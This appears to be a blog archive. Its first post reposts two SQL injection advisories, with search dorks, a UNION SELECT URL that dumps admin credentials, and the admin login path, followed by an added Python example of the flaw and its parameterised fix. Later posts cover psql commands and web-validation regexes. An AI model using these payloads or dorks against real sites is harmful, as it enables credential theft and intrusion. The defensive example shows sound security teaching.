2010.07.08 18:23

SQL Injection Vulnerability

SQL Injection Vulnerabilities Green Shop
  
[x] Type: SQL Injection Vulnerabilities
[x] Vendor: egreen.ir
[x] Script Name: Green Shop
[x] author: Ashiyane Digital Security Team
[x] Thanks To N4H
[?] Submit By PrinceofHacking ^_^
[x] Mail : Prince[dot]H4ck@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
D0rk: "egreen.ir"
 
Exploit:
http://site.org/index.php?pid=[SQLi]
 
Ex:
http://site.org/index.php?pid=77/**/Union/**/SELECT/**/Group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/admins/**/--
 
Login Page :
http://site.org/admin/login.php
 
Special Tnx : All Ashiyane Members


Zylone IT Multiple Blind SQL Injection Vulnerability

# Exploit Title: Zylone IT Multiple Blind SQL Injection Vulnerability
# Date: 2010-07-08
# Author: Callo
# Software Link: http://www.zylone.com/
# Version: Unknown
# Tested on: php
  
~# Title: Zylone IT Multiple Blind SQL Injection Vulnerability
~# Date: 2010-07-07
~# Author: Callo
~# Home: www.gsk2.org
~# Software Link: http://www.zylone.com/
~# Version: Unknown
~# Tested on: php
~# Dork: Powered by Zylone IT
         Powered By: Zylone IT
~# Exploit: http://localhost/[PATH]/news_details.php?news_id=[BLIND SQLi]
            http://localhost/[PATH]/news.php?cat_id=[BLIND SQLi]
            http://localhost/[PATH]/news_details.php?sec_id=[BLIND SQLi]
            http://localhost/[PATH]/home.php?page_id=[BLIND SQLi]
            http://localhost/[PATH]/events.php?cat_id=[BLIND SQLi]
            http://localhost/[PATH]/policy.php?sec_id=[BLIND SQLi]
~# Greetz: Whivack


Source: exploit-db.com
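The defect behind a `?pid=[SQLi]` finding and its fix, as an added Python example that is not code from either advisory or vendor: an in-memory SQLite stand-in (all table and column names are constructed assumptions) where the concatenating lookup lets a crafted `pid` pull rows from an unrelated table, while the corrected lookup enforces the integer type and binds the value as a parameter.

```python
import sqlite3


def make_db():
    # Constructed stand-in for a shop database; schema and rows are assumptions.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT);
        CREATE TABLE admins (username TEXT, password TEXT);
        INSERT INTO products VALUES (77, 'green tea');
        INSERT INTO admins VALUES ('admin', 'hash-of-secret');
    """)
    return con


def lookup_product_unsafe(con, pid):
    # The pattern behind "index.php?pid=[SQLi]": the raw query-string value is
    # pasted into the statement text, so whoever controls pid controls the SQL.
    sql = "SELECT name, id FROM products WHERE id = " + pid
    return con.execute(sql).fetchall()


def lookup_product_safe(con, pid):
    # Fix: reject anything that is not a decimal integer, then bind the value as a
    # parameter so the driver treats it as data and the statement text never changes.
    if not (pid.isascii() and pid.isdigit()):
        raise ValueError("pid must be a decimal integer")
    sql = "SELECT name, id FROM products WHERE id = ?"
    return con.execute(sql, (int(pid),)).fetchall()


def demo():
    """Return (rows the unsafe lookup leaks, whether the safe lookup rejected the input)."""
    con = make_db()
    # Constructed input in the shape of the advisory's UNION technique, reduced to
    # two columns to fit this toy schema.
    hostile = "77 UNION SELECT username || ':' || password, 2 FROM admins --"
    leaked = lookup_product_unsafe(con, hostile)
    try:
        lookup_product_safe(con, hostile)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, rejected
```

The same two-step rule (validate the type, then bind) applies to every `[BLIND SQLi]` parameter listed for Zylone IT, since each one is an integer id.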

2010.02.18 18:48

Using psql, the default PostgreSQL client

psql shell options

[root@linux root]# psql --help 
This is psql 7.4.1, the PostgreSQL interactive terminal. 
 
Usage: 
  psql [OPTIONS]... [DBNAME [USERNAME]] 
 
General options: 
  -d DBNAME       specify database name to connect to (default: "root") 
  -c COMMAND      run only single command (SQL or internal) and exit 
  -f FILENAME     execute commands from file, then exit 
  -l              list available databases, then exit 
  -v NAME=VALUE   set psql variable NAME to VALUE 
  -X              do not read startup file (~/.psqlrc) 
  --help          show this help, then exit 
  --version       output version information, then exit 
 
Input and output options: 
  -a              echo all input from script 
  -e              echo commands sent to server 
  -E              display queries that internal commands generate 
  -q              run quietly (no messages, only query output) 
  -o FILENAME     send query results to file (or |pipe) 
  -n              disable enhanced command line editing (readline) 
  -s              single-step mode (confirm each query) 
  -S              single-line mode (end of line terminates SQL command) 
 
Output format options: 
  -A              unaligned table output mode (-P format=unaligned) 
  -H              HTML table output mode (-P format=html) 
  -t              print rows only (-P tuples_only) 
  -T TEXT         set HTML table tag attributes (width, border) (-P tableattr=) 
  -x              turn on expanded table output (-P expanded) 
  -P VAR[=ARG]    set printing option VAR to ARG (see \pset command) 
  -F STRING       set field separator (default: "|") (-P fieldsep=) 
  -R STRING       set record separator (default: newline) (-P recordsep=) 
 
Connection options: 
  -h HOSTNAME     database server host or socket directory (default: "local socket") 
  -p PORT         database server port (default: "5432") 
  -U NAME         database user name (default: "root") 
  -W              prompt for password (should happen automatically) 
 
For more information, type "\?" (for internal commands) or "\help" 
(for SQL commands) from within psql, or consult the psql section in 
the PostgreSQL documentation. 
 
Report bugs to <pgsql-bugs@postgresql.org>. 
 
-d DBNAME Selects the database to use (defaults to the user's ID; in this document, root).
-c COMMAND Runs a single query given as -c "SQL" and then exits.
-f FILENAME Runs the SQL in the file and then exits.
-l Lists the databases and then exits (same as \l inside psql).
-h HOSTNAME Connects to a remote host (pg_hba.conf will be covered in a later document).
-p PORT Port of the PostgreSQL server.
-U NAME User name to connect as.
  • These are roughly the most commonly used options. Run --help for the full list.


Commonly used commands

\d Lists tables, indexes, sequences and views (\d+ also shows each table's comment).
\dt {TABLENAME} Lists tables (\dt+ also shows the comment of each table and field).
\di {INDEXNAME} Lists indexes (\di+ also shows each index's comment).
\ds {SEQUENCENAME} Lists sequences (\ds+ also shows each sequence's comment).
\dv {VIEWNAME} Lists views (\dv+ also shows the comment of each view and field).
\dn {SCHEMANAME} Lists schemas (a recently added concept, similar to Oracle namespaces).
\du {USERNAME} Lists users.
\l Lists databases (\l+ also shows each database's comment).
\i FILENAME Runs the SQL in the file.
\c DBNAME {USERNAME} Connects to another database; you can also connect as a different user name.
\q Quit (important: I fumbled at first because I didn't know it. Note that Ctrl-C doesn't work for this -_-;)


General
  \c[onnect] [DBNAME|- USER|- HOST|- PORT|-]
                 connect to new database (currently "gsimplexi")
  \cd [DIR]      change the current working directory
  \copyright     show PostgreSQL usage and distribution terms
  \encoding [ENCODING]
                 show or set client encoding
  \h [NAME]      help on syntax of SQL command NAME, * for all commands
  \prompt [TEXT] NAME
                 prompt user to set internal variable
  \password [USERNAME]
                 securely change the password for a user
  \q             quit psql
  \set [NAME [VALUE]]
                 set internal variable, or list all if no parameters
  \timing        toggle timing of commands (currently off)
  \unset NAME    unset (delete) internal variable
  \! [COMMAND]   execute command in shell

Query Buffer
  \e FILE        edit the current query buffer (or the given file) with external editor
  \g [FILE]      send query buffer to server (and results to [FILE] or |pipe)
  \p             show the contents of the current query buffer
  \r             reset (clear) the query buffer
  \s [FILE]      display history, or the history saved in [FILE]
  \w FILE        write current query buffer to FILE

Input/Output
  \echo [STRING] write STRING to standard output
  \i FILE        execute commands from FILE
  \o FILE        send all query results to FILE, or to a |pipe
  \qecho [STRING]
                 write [STRING] to query output stream (see \o)

Informational
  \d [NAME]     describe table, view, index, or sequence
  \d{t|i|s|v|S} [PATTERN] (add "+" for more detail)
                 list tables/indexes/sequences/views/system tables
  \da [PATTERN]  list aggregate functions
  \db [PATTERN]  list tablespaces (add "+" for more detail)
  \dc [PATTERN]  list character-set conversions
  \dC            list casts
  \dd [PATTERN]  show comment for object
  \dD [PATTERN]  list domains
  \df [PATTERN]  list functions (add "+" for more detail)
  \dF [PATTERN]  list text search configurations (add "+" for more detail)
  \dFd [PATTERN] list text search dictionaries (add "+" for more detail)
  \dFt [PATTERN] list text search templates
  \dFp [PATTERN] list text search parsers (add "+" for more detail)
  \dg [PATTERN]  list groups
  \dn [PATTERN]  list schemas (add "+" for more detail)
  \do [NAME]     list operators
  \dl            list large objects, same as \lo_list
  \dp [PATTERN]  list table, view, and sequence access privileges
  \dT [PATTERN]  list data types (add "+" for more detail)
  \du [PATTERN]  list users
  \l             list all databases (add "+" for more detail)
  \z [PATTERN]   list table, view, and sequence access privileges (same as \dp)

Formatting
  \a             toggle output alignment mode
  \C [STRING]    set table title, or unset if no STRING given
  \f [STRING]    set field separator to STRING
  \H             toggle HTML output mode (currently off)
  \pset NAME [VALUE]
                 set table output option
                 (NAME := {format|border|expanded|fieldsep|footer|null|
                 numericlocale|recordsep|tuples_only|title|tableattr|pager})
  \t             toggle display of table field names (currently off)
  \T [STRING]    set HTML <table> tag attributes, or unset if none
  \x             toggle expanded output mode (currently off)

Copy, Large Object
  \copy ...      same as the SQL COPY command
  \lo_export LOBOID FILE
  \lo_import FILE [COMMENT]
  \lo_list
  \lo_unlink LOBOID    large object operations


Source: http://www.joinc.co.kr


2009.09.30 09:46

8 useful regular expressions for web development

Background Info on Regular Expressions

This is what Wikipedia has to say about them:

In computing, regular expressions provide a concise and flexible means for identifying strings of text of interest, such as particular characters, words, or patterns of characters. Regular expressions (abbreviated as regex or regexp, with plural forms regexes, regexps, or regexen) are written in a formal language that can be interpreted by a regular expression processor, a program that either serves as a parser generator or examines text and identifies parts that match the provided specification.

Now, that doesn't really tell me much about the actual patterns. The regexes I'll be going over today contain characters such as \w, \s, \1, and many others that represent something totally different from what they look like.

If you'd like to learn a little about regular expressions before you continue reading this article, I'd suggest watching the Regular Expressions for Dummies screencast series.

The eight regular expressions we'll be going over today will allow you to match a(n): username, password, email, hex value (like #fff or #000), slug, URL, IP address, and an HTML tag. As the list goes down, the regular expressions get more and more confusing. The pictures for each regex in the beginning are easy to follow, but the last four are more easily understood by reading the explanation.

The key thing to remember about regular expressions is that they are almost read forwards and backwards at the same time. This sentence will make more sense when we talk about matching HTML tags.

Note: The delimiters used in the regular expressions are forward slashes, "/". Each pattern begins and ends with a delimiter. If a forward slash appears in a regex, we must escape it with a backslash: "\/".

Matching a Username

Pattern:

Description:

We begin by telling the parser to find the beginning of the string (^), followed by any lowercase letter (a-z), number (0-9), an underscore, or a hyphen. Next, {3,16} makes sure that there are at least 3 of those characters, but no more than 16. Finally, we want the end of the string ($).

String that matches:

my-us3r_n4m3

String that doesn't match:

th1s1s-wayt00_l0ngt0beausername (too long)

Matching a Password

Pattern:

Description:

Matching a password is very similar to matching a username. The only difference is that instead of 3 to 16 letters, numbers, underscores, or hyphens, we want 6 to 18 of them ({6,18}).

String that matches:

myp4ssw0rd

String that doesn't match:

mypa$$w0rd (contains a dollar sign)

Matching a Hex Value

Pattern:

Description:

We begin by telling the parser to find the beginning of the string (^). Next, a number sign is optional because it is followed by a question mark. The question mark tells the parser that the preceding character (in this case a number sign) is optional, but to be "greedy" and capture it if it's there. Next, inside the first group (first group of parentheses), we can have two different situations. The first is any lowercase letter between a and f or a number, six times. The vertical bar tells us that we can also have three lowercase letters between a and f or numbers instead. Finally, we want the end of the string ($).

The reason I put the six-character alternative first is that the parser will then capture a full hex value like #ffffff. If I had reversed it so that the three characters came first, the parser would only pick up #fff and not the other three f's.

String that matches:

#a3c113

String that doesn't match:

#4d82h4 (contains the letter h)

Matching a Slug

Pattern:

Description:

You will be using this regex if you ever have to work with mod_rewrite and pretty URLs. We begin by telling the parser to find the beginning of the string (^), followed by one or more (the plus sign) letters, numbers, or hyphens. Finally, we want the end of the string ($).

String that matches:

my-title-here

String that doesn't match:

my_title_here (contains underscores)

Matching an Email

Pattern:

Description:

We begin by telling the parser to find the beginning of the string (^). Inside the first group, we match one or more lowercase letters, numbers, underscores, dots, or hyphens. I have escaped the dot because a non-escaped dot means any character. Directly after that, there must be an at sign. Next is the domain name, which must be one or more lowercase letters, numbers, underscores, dots, or hyphens. Then another (escaped) dot, with the extension being two to six letters or dots. I have 2 to 6 because of the country-specific TLDs (.ny.us or .co.uk). Finally, we want the end of the string ($).

String that matches:

john@doe.com

String that doesn't match:

john@doe.something (TLD is too long)

Matching a URL

Pattern:

Description:

This regex is almost like taking the ending part of the above regex, slapping it between "http://" and some file structure at the end. It sounds a lot simpler than it really is. To start off, we search for the beginning of the line with the caret.

The first capturing group is all optional. It allows the URL to begin with "http://", "https://", or neither of them. I have a question mark after the s to allow URLs that have http or https. In order to make this entire group optional, I just added a question mark to the end of it.

Next is the domain name: one or more numbers, letters, dots, or hyphens followed by another dot, then two to six letters or dots. The following section is the optional files and directories. Inside the group, we want to match any number of forward slashes, letters, numbers, underscores, spaces, dots, or hyphens. Then we say that this group can be matched as many times as we want. Pretty much this allows multiple directories to be matched along with a file at the end. I have used the star instead of the question mark because the star says zero or more, not zero or one. If a question mark were used there, only one file/directory would be able to be matched.

Then a trailing slash is matched, but it can be optional. Finally we end with the end of the line.

String that matches:

http://net.tutsplus.com/about

String that doesn't match:

http://google.com/some/file!.html (contains an exclamation point)

Matching an IP Address

Pattern:

Description:

Now, I'm not going to lie, I didn't write this regex; I got it from here. Now, that doesn't mean that I can't rip it apart character for character.

The first capture group really isn't a captured group, because ?: was placed inside, which tells the parser not to capture this group (more on this in the last regex). We also want this non-captured group to be repeated three times (the {3} at the end of the group). This group contains another group, a subgroup, and a literal dot. The parser looks for a match in the subgroup, then a dot to move on.

The subgroup is also another non-capture group. It's just a bunch of character sets (things inside brackets): the string "25" followed by a number between 0 and 5; or the string "2" and a number between 0 and 4 and any number; or an optional zero or one followed by two numbers, with the second being optional.

After we match three of those, it's onto the next non-capturing group. This one wants: the string "25" followed by a number between 0 and 5; or the string "2" with a number between 0 and 4 and another number at the end; or an optional zero or one followed by two numbers, with the second being optional.

We end this confusing regex with the end of the string.

String that matches:

73.60.124.136 (no, that is not my IP address :P)

String that doesn't match:

256.60.124.136 (the first group must be "25" and a number between zero and five)

Matching an HTML Tag

Pattern:

Description:

One of the more useful regexes on the list. It matches any HTML tag with the content inside. As usual, we begin with the start of the line.

First comes the tag's name. It must be one or more letters long. This is the first capture group; it comes in handy when we have to grab the closing tag. Next come the tag's attributes. These are any character but a greater than sign (>). Since this is optional, but I want to match more than one character, the star is used. The plus sign makes up the attribute and value, and the star says as many attributes as you want.

Next comes the third non-capture group. Inside, it will contain either a greater than sign, some content, and a closing tag; or some spaces, a forward slash, and a greater than sign. The first option looks for a greater than sign followed by any number of characters, and the closing tag. \1 is used, which represents the content that was captured in the first capturing group; in this case it was the tag's name. Now, if that couldn't be matched, we want to look for a self-closing tag (like an img, br, or hr tag). This needs to have one or more spaces followed by "/>".

The regex is ended with the end of the line.

String that matches:

<a href="http://net.tutsplus.com/">Nettuts+</a>

String that doesn't match:

<img src="img.jpg" alt="My image>" /> (attributes can't contain greater than signs)
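The eight patterns as a runnable Python check, an added example rather than the article's own code: the pattern images are not on this page, so the regexes below are reconstructed from the descriptions above (the HTML tag pattern follows the description and excludes ">" inside attributes), and the two nested repeats the article describes, the URL's directory group and the tag's attribute group, are written as a single quantifier because the nested form backtracks exponentially on input that does not match.

```python
import re

# Reconstructed from the article's descriptions (the original pattern images are not
# on this page), compiled with re.ASCII so \w and \d mean ASCII as the article intends.
# The URL directory group and the tag attribute group use one quantifier instead of
# the nested "(...)*" the article describes: same language, no exponential backtracking.
PATTERNS = {
    "username": r"^[a-z0-9_-]{3,16}$",
    "password": r"^[a-z0-9_-]{6,18}$",
    "hex":      r"^#?([a-f0-9]{6}|[a-f0-9]{3})$",
    "slug":     r"^[a-z0-9-]+$",
    "email":    r"^([a-z0-9_\.-]+)@([\da-z\.-]+)\.([a-z\.]{2,6})$",
    "url":      r"^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)\/?$",
    "ip":       r"^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}"
                r"(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$",
    "html_tag": r"^<([a-z]+)([^>]*)(?:>(.*)<\/\1>|\s+\/>)$",
}
COMPILED = {name: re.compile(p, re.ASCII) for name, p in PATTERNS.items()}

# The matching / non-matching strings the article gives for each pattern.
EXAMPLES = {
    "username": ("my-us3r_n4m3", "th1s1s-wayt00_l0ngt0beausername"),
    "password": ("myp4ssw0rd", "mypa$$w0rd"),
    "hex":      ("#a3c113", "#4d82h4"),
    "slug":     ("my-title-here", "my_title_here"),
    "email":    ("john@doe.com", "john@doe.something"),
    "url":      ("http://net.tutsplus.com/about", "http://google.com/some/file!.html"),
    "ip":       ("73.60.124.136", "256.60.124.136"),
    "html_tag": ('<a href="http://net.tutsplus.com/">Nettuts+</a>',
                 '<img src="img.jpg" alt="My image>" />'),
}


def matches(name, text):
    """True when the whole string matches (every pattern is anchored with ^ and $)."""
    return COMPILED[name].match(text) is not None


def check_examples():
    """Names whose article examples do not behave as described; empty list means all agree."""
    return [name for name, (good, bad) in EXAMPLES.items()
            if not matches(name, good) or matches(name, bad)]


def hex_digits(text):
    """Captured digits of a hex colour; shows that the six-digit branch wins for #ffffff."""
    m = COMPILED["hex"].match(text)
    return m.group(1) if m else None


def tag_parts(text):
    """(tag name, inner content) for a matched tag; content is None for a self-closing tag."""
    m = COMPILED["html_tag"].match(text)
    return (m.group(1), m.group(3)) if m else None
```

One caveat for validation code: in Python, `$` also matches just before a trailing newline, so a strict username or slug check should use `re.fullmatch` or end the pattern with `\Z` instead.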


Original: http://net.tutsplus.com/tutorials/other/8-regular-expressions-you-should-know/

